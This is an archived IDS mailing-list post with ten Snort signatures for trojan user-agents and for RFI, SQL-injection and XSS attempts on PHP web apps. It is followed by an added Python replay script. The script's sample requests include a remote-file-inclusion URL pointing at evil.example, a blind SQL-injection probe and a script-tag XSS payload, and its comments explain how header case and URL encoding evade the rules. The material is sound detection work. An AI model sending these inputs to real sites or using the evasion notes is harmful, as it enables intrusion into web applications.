[Emerging-Sigs] StillSecure: 10 New Signatures - October 14th, 2011

signatures signatures at stillsecure.com
Fri Oct 14 07:10:52 EDT 2011


Hi Matt,

Please find the 10 signatures below,

1. VIRUS Suspicious user-agent string (Se2011)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"VIRUS Suspicious user-agent string (Se2011)"; flow:established,to_server; content:"|0d 0a|User-Agent|3a| Se2011"; classtype:trojan-activity; reference:url,threatexpert.com/report.aspx?md5=ed1ad8a8ff2357b1665055ac01b2df14; sid:14101; rev:1;)

2. VIRUS Suspicious user-agent string (GPRecover)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"VIRUS Suspicious user-agent string (GPRecover)"; flow:established,to_server; content:"|0d 0a|User-Agent|3a| GPRecover"; classtype:trojan-activity; reference:url,virustotal.com/file-scan/report.html?id=9524777b79c1e5ead00906f3d19c8714be5dba144bd3978adb2b05252fa0c739-1300934042; sid:14102; rev:1;)

3. VIRUS suspicious useragent string EjUpdate
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"VIRUS suspicious useragent string EjUpdate"; flow:established,to_server; content:"|0d 0a|User-Agent|3A 20|EjUpdate"; classtype:trojan-activity; reference:url,threatexpert.com/report.aspx?md5=7bd56e44af2ea2267bf8de2bb98101ff; sid:1110111; rev:1;)

4. WEB-PHP ShowTopKB.php script Remote File inclusion Attempt
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP ShowTopKB.php script Remote File inclusion Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/includes/pages/ShowTopKB.php?"; nocase; uricontent:"ReportID="; nocase; pcre:"/ReportID=\s*(ftps?|https?|php)\:\//Ui"; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/view/105668/2moons-rfi.txt; sid:1110113; rev:1;) 

5. WEB-PHP Smarty.class.php script Remote File inclusion Attempt 
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Smarty.class.php script Remote File inclusion Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/includes/libs/Smarty/Smarty.class.php?"; nocase; uricontent:"file="; nocase; pcre:"/file=\s*(ftps?|https?|php)\:\//Ui"; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/view/105668/2moons-rfi.txt; sid:1110114; rev:1;) 

6. WEB-PHP ShowModVersionPage.php script Remote File inclusion Attempt 
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP ShowModVersionPage.php script Remote File inclusion Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/includes/pages/adm/ShowModVersionPage.php?"; nocase; uricontent:"File="; nocase; pcre:"/file=\s*(ftps?|https?|php)\:\//Ui"; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/view/105668/2moons-rfi.txt; sid:1110115; rev:1;) 

7. WEB-PHP smarty_internal_resource_php.php script Remote File inclusion Attempt 
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP smarty_internal_resource_php.php script Remote File inclusion Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/includes/libs/Smarty/sysplugins/smarty_internal_resource_php.php?"; nocase; uricontent:"_smarty_template="; nocase; pcre:"/_smarty_template=\s*(ftps?|https?|php)\:\//Ui"; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/view/105668/2moons-rfi.txt; sid:1110116; rev:1;) 

8. WEB-PHP smarty_internal_templatecompilerbase.php script Remote File inclusion Attempt 
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP smarty_internal_templatecompilerbase.php script Remote File inclusion Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/includes/libs/Smarty/sysplugins/smarty_internal_templatecompilerbase.php?"; nocase; uricontent:"file="; nocase; pcre:"/file=\s*(ftps?|https?|php)\:\//Ui"; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/view/105668/2moons-rfi.txt; sid:1110117; rev:1;)

9. WEB-PHP Joomla component CalcBuilder Blind SQL Injection Attempt
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Joomla component CalcBuilder Blind SQL Injection Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?"; nocase; uricontent:"option=com_calcbuilder"; nocase; uricontent:"controller=calcbuilder"; nocase; uricontent:"id="; nocase; uricontent:"and"; nocase; uricontent:"substring"; nocase; pcre:"/and.*substring\(/Ui"; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/view/102435/joomlacalcbuilder-sql.txt; sid:1210112; rev:1;)

10. WEB-PHP Mambo component N-Namskeid XSS Vulnerability
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Mambo component N-Namskeid XSS Vulnerability"; flow:established,to_server; uricontent:"/index.php?"; nocase; uricontent:"option=com_n-namskeid"; nocase; uricontent:"do="; nocase; pcre:"/do\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D)/Ui"; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/view/104690/mambonnamskeid-xss.txt; sid:1310111; rev:1;)

Looking forward to your comments, if any.

Thanks & Regards,
StillSecure
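Added example, not part of StillSecure's post or the Emerging Threats ruleset: the matching logic of the ten rules above replayed in Python over constructed HTTP requests, so a reviewer can see which request shapes each rule fires on and which it misses. It assumes that percent-decoding the URI with `unquote()` is an adequate stand-in for Snort's http_inspect URI normalization (which is what `uricontent` and `pcre /U` match against), and it keeps the three VIRUS rules case-sensitive because their `content` matches carry no `nocase`. All hostnames and requests in `SAMPLES` are constructed.

```python
"""Replay the logic of the ten posted Snort rules over constructed HTTP requests.
Added example; assumption: unquote() approximates http_inspect URI normalization."""
import re
from urllib.parse import unquote

# VIRUS rules: raw-buffer match on CRLF + "User-Agent: <prefix>", case-sensitive (no nocase).
UA_RULES = [
    ("VIRUS Suspicious user-agent string (Se2011)", b"\r\nUser-Agent: Se2011"),
    ("VIRUS Suspicious user-agent string (GPRecover)", b"\r\nUser-Agent: GPRecover"),
    ("VIRUS suspicious useragent string EjUpdate", b"\r\nUser-Agent: EjUpdate"),
]

# 2moons RFI rules: (msg, script path uricontent, parameter checked by the pcre).
RFI_RULES = [
    ("WEB-PHP ShowTopKB.php script Remote File inclusion Attempt",
     "/includes/pages/ShowTopKB.php?", "ReportID"),
    ("WEB-PHP Smarty.class.php script Remote File inclusion Attempt",
     "/includes/libs/Smarty/Smarty.class.php?", "file"),
    ("WEB-PHP ShowModVersionPage.php script Remote File inclusion Attempt",
     "/includes/pages/adm/ShowModVersionPage.php?", "File"),
    ("WEB-PHP smarty_internal_resource_php.php script Remote File inclusion Attempt",
     "/includes/libs/Smarty/sysplugins/smarty_internal_resource_php.php?", "_smarty_template"),
    ("WEB-PHP smarty_internal_templatecompilerbase.php script Remote File inclusion Attempt",
     "/includes/libs/Smarty/sysplugins/smarty_internal_templatecompilerbase.php?", "file"),
]

SQLI_MSG = "WEB-PHP Joomla component CalcBuilder Blind SQL Injection Attempt"
SQLI_RE = re.compile(r"and.*substring\(", re.I | re.S)  # mirrors pcre:"/and.*substring\(/Ui"
XSS_MSG = "WEB-PHP Mambo component N-Namskeid XSS Vulnerability"
XSS_RE = re.compile(r"do=.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop"
                    r"|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect"
                    r"|onchange|style=)", re.I)


def parse_request(raw: bytes):
    """Return (method, normalized_uri) from a raw HTTP request, or None if malformed."""
    line = raw.split(b"\r\n", 1)[0].decode("latin-1")
    parts = line.split(" ")
    if len(parts) < 2:
        return None
    # Assumption: unquote() stands in for http_inspect's URI normalization.
    return parts[0], unquote(parts[1])


def match_rules(raw: bytes) -> list:
    """Return the msg of every posted rule whose conditions this request satisfies."""
    fired = []
    for msg, needle in UA_RULES:
        if needle in raw:  # exact, case-sensitive byte match like the rule's content
            fired.append(msg)
    parsed = parse_request(raw)
    if parsed is None:
        return fired
    method, uri = parsed
    low = uri.lower()
    for msg, path, param in RFI_RULES:
        # content:"GET " depth:4, both nocase uricontents, then the /Ui pcre.
        if (method == "GET" and path.lower() in low and (param + "=").lower() in low
                and re.search(param + r"=\s*(ftps?|https?|php):/", uri, re.I)):
            fired.append(msg)
    if (method == "GET" and "/index.php?" in low and "option=com_calcbuilder" in low
            and "controller=calcbuilder" in low and "id=" in low and "and" in low
            and "substring" in low and SQLI_RE.search(uri)):
        fired.append(SQLI_MSG)
    if ("/index.php?" in low and "option=com_n-namskeid" in low and "do=" in low
            and XSS_RE.search(uri)):
        fired.append(XSS_MSG)
    return fired


# Constructed sample traffic; none of these hosts or requests are real captures.
SAMPLES = {
    "beacon": b"GET /gate.php HTTP/1.1\r\nHost: c2.example\r\nUser-Agent: Se2011\r\n\r\n",
    "rfi": b"GET /includes/pages/ShowTopKB.php?ReportID=http://evil.example/s.txt? HTTP/1.1\r\nHost: game.example\r\n\r\n",
    "rfi_encoded": b"GET /includes/pages/ShowTopKB.php?ReportID=http%3A%2F%2Fevil.example%2Fs.txt HTTP/1.1\r\nHost: game.example\r\n\r\n",
    "sqli": b"GET /index.php?option=com_calcbuilder&controller=calcbuilder&id=1%20and%20substring(version(),1,1)=5 HTTP/1.1\r\nHost: j.example\r\n\r\n",
    "xss": b"GET /index.php?option=com_n-namskeid&do=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1\r\nHost: m.example\r\n\r\n",
    "benign": b"GET /index.php?option=com_content&id=5 HTTP/1.1\r\nHost: j.example\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "ua_lowercase": b"GET / HTTP/1.1\r\nuser-agent: Se2011\r\n\r\n",  # header case evades: no nocase
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:12s} -> {match_rules(raw) or ['(no alert)']}")
```

Two things the replay makes visible. The `rfi_encoded` request only fires because the URI is decoded before matching; the posted rules rely on Snort's URI normalization for that, so on a sensor without http_inspect covering the port they would miss `http%3A%2F%2F`. And `ua_lowercase` shows that the three VIRUS rules match the header name literally: HTTP header names are case-insensitive, so a client sending `user-agent:` slips past unless `nocase` is added (or the match is moved to an HTTP header buffer).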
